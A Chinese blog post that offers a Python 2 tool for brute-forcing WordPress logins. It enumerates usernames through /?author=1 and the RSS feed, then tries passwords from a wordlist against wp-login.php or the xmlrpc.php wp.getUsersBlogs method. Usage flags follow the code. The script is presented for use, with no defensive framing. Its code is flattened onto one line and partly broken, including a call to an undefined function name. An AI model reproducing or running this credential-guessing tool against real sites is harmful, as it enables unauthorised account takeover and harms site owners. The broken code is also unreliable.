wordperss 批量爆破(犀利)

  • A+
所属分类:颓废's Blog
摘要

1.参数化操作 2.内置两种暴力破解方式,通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

先说这一款软件
 

1.参数化操作

2.内置两种暴力破解方式,通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

3.内置自动获取用户名功能。/?author=1 还有rss 两种方式获取。由于wp主题众多,匹配正则太少,所以会不准。配合百度爬虫试了一下效果,准确率70%。

4.同目录下新建pass.txt 就可以跑密码啦。

代码如下:
#!/usr/bin/env python#coding:utf-8__author__ = 'mtfly'import requestsimport stringimport timeimport refrom optparse import OptionParserdef crack_xmlrpc(username, password, url):     crack_url = url + "/xmlrpc.php"     #print crack_url     post = '''         <?xml version="1.0" encoding="iso-8859-1"?>         <methodCall>           <methodName>wp.getUsersBlogs</methodName>           <params>          <param><value>''' + username + '''</value></param>          <param><value>''' + password + '''</value></param>           </params>         </methodCall>'''     headers = {         'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',         'Referer': crack_url   }     try:         res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content      #print "ok"     except Exception, e:         print "error", e  else:         if '<int>405</int>' in res:             print "XML-RPC has been disabled. Please use the wp-admin.php"         elif "faultCode" in res:             print "The password is not:", password     elif "isAdmin" in res:             print "/nThe password is ", password             exit()def crack_wp_login(username, password, url):     crack_url = url + "/wp-login.php"     #print crack_url     headers = {         'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',         'Content-Type': 'application/x-www-form-urlencoded'     }     post = {'log': username, 'pwd': password}     try:         res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content  except Exception, e:         print "error", e  else:         if 'lostpassword' in res:             print "The password is not:", password     elif "welcome-panel" in res:             print "/nThe password is ", password             exit()def get_author(url):     get_url0 = url + "/?feed=rss2"     get_url1 = url + "/?author=1"     headers = {         'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'     }     #print get_url     try:         res0 = requests.get(get_url0)         res1 = requests.get(get_url1)         html0 = res0.content         html1 = res1.content         s0 = re.findall('<dc:creator></!/[CDATA/[(.*?)/]/]><//dc:creator>',html0)         s1 = re.findall('<title>(.*?)/s',html1)         if len(s1) == 0:             # print "null"             # print res.url             s1 = re.findall('author/(.*?)/', res1.url)         s = s0 +s1       print "The Username maybe:"         for i in list(set(s)):             print i    except Exception, e:         print e   p = OptionParser()p.add_option('-u', '--url', type="string", help='Input the url')p.add_option('-a', '--admin',default="admin", type="string", help='Input the username')p.add_option('-g', '--getauthor',default=False, action="store_true", help='Get admin/'username')p.add_option('-w', '--crack_wp_login',default=False, action="store_true", help='Crack by wp-login')p.add_option('-x', '--crack_xmlrpc',default=False, action="store_true", help='Crack by xmlrpc')options, args = p.parse_args()url = options.url admin = options.admin author = options.getauthor w = options.crack_wp_login x = options.crack_xmlrpc# url = "http://mtfly.net"# url = "http://127.0.0.1/wp/"print urlif author:     get_author(url)     exit()f = open("pass.txt", "r")for line in f:     #print line.strip()     if w:         crack_wp_login(admin, line.strip(), url)     if x:         crack_xmlrpr(admin, line.strip(), url)f.close
 

新建pass.txt并且添加测试密码。

-u 后面接wp的url 记得带上http://

-a 后面跟用户名 默认是admin

-g 自动判断管理员用户名,准确率较低。获取用户名后自动退出。

-w 用 /wp-login.php 模拟后台网页登录

-x 用 /xmlrpc.php接口 POST登录

速度杠杠的   这是没有什么话说的 




  文件名稱:w响应国家号召,禁止资源下载

  更新時間:

  下載声明:响应国家号召,禁止资源下载

立即下載

下载链接

网盘下载

响应国家号召,禁止资源下载

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: